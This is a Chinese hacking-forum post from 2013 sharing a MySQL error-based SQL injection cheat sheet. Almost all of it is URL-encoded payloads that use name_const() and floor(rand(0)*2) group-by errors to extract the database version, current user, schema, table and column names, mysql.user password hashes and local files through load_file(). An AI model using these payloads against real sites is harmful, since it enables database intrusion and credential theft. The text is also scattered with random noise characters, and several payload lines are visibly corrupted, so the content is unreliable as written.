找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2199|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 + S: ]  @: B9 [1 C. e0 {

8 _/ b$ Y, E$ I- b7 W& j7 _% s0 I& Q& p' E
Mysql暴错注入参考(pdf),每天一贴。。。7 r# g. J6 I9 q- W) U5 n

# a. X. [# T# r# w' v; M$ b! m) cMySql Error Based Injection Reference  z* k  {+ ]6 B& F, Q1 i/ L1 V6 Z, {
[Mysql暴错注入参考]" d; Z& w: O4 N  ~6 ]2 I# |! y# e
Authornig0s1992' D3 H% T; E6 [; A6 Q( a$ |" ^
Blog:http://pnig0s1992.blog.51cto.com/
4 Z( @& K5 y$ K3 L7 Y" yTeAm:http://www.FreeBuf.com/+ _9 m: O, T: P
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功2 R0 q+ |! V; F6 @7 B* x: Q+ ]2 O: K
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
1 Y0 S* [. n; j# R查询版本:
2 ~' @$ E9 Y1 w2 FMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
( ?  _. x; b. r: t1 c# zjoin+(select+name_const(@@version,0))b)c)* R3 l9 C" d7 i9 M2 V
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro8 {6 x, D* E4 o8 j9 ^5 I; ~# Q
up by a)b)
9 y& a* [5 R0 x查询当前用户:
( w0 P# W- z, j' C5 L* FMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
1 ~: M; x0 w2 M6 A( x$ ~Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
4 f  n/ \: w3 U* Yand(0)*2))x+from+information_schema.tables+group+by+x)a)
; X  x1 f- b* P; H4 U  U" e查询当前数据库:8 t9 A, E8 U" |
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)& I8 y/ \! o  |% U& Z
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
+ N; T8 x. v$ [or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
8 j) y4 s; \( z5 G7 I依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
5 ~9 p, ]4 O3 ALIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
6 V3 L4 u- v7 v7 b2 Y% Y# E顺序替换0 i- t3 \5 g6 {$ ~3 S' N
爆指定库数目:( F6 M4 [+ b* P3 U+ |) B0 m4 h/ C" x" R
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
% V$ k7 G& s2 gable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group1 ?* x0 ^1 p- E6 d- v* ]
+by+x)a)+and+1=1 0x6D7973716C=mysql
) A9 u) I$ ~" t9 p* @/ C依次爆表:. ?3 X# M2 V! c( w& v& E" W/ j
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t# p, H& [4 l+ {, F5 u
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta0 S) G- _$ Q3 ~$ ~/ H( a; `
bles+group+by+x)a)+and+1=1* q8 x" w5 R! Y/ V
0x6D7973716C=Mysql 将n顺序替换/ F+ h* v& P% ~: H( p: |' A
爆表内字段数目:
9 E& F0 k; f: c) c9 i8 mand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE; K( n* B) {* E& E
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran% _$ |" _9 V% `8 K
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
3 x! ?0 F, i1 O! Q* h& }依次爆字段:+ w4 o- s4 {+ n  B" n" L! m% \
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where7 ?' J& Z) w) e9 u" n
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1) m& y: ~5 w# T8 G8 E) q  U
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
0 G( S/ C( y) i2 d. y' A依次暴内容:& a7 c8 e; n  S$ X8 W( x. X
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
2 I+ @8 l+ u& o+ ?3 e( j$ ~ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
  E, T$ e! m; e# C将n顺序替换8 u. r$ Y3 @* t4 p/ ~" V* }) g( Q
爆文件内容:( M5 L5 G' o0 o" C6 O- G5 c
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a! b& X- l; _$ p% l
from+information_schema.tables+group+by+a)b)
) C, G- T% v* R# E7 n0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节, y- m4 a/ l: K/ T
Thx for reading.
- e. a/ z) e6 \! K# Q
4 n1 j  o6 q5 G( ]0 V, g不要下载也可以, ( {8 z( @% a$ L/ p

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表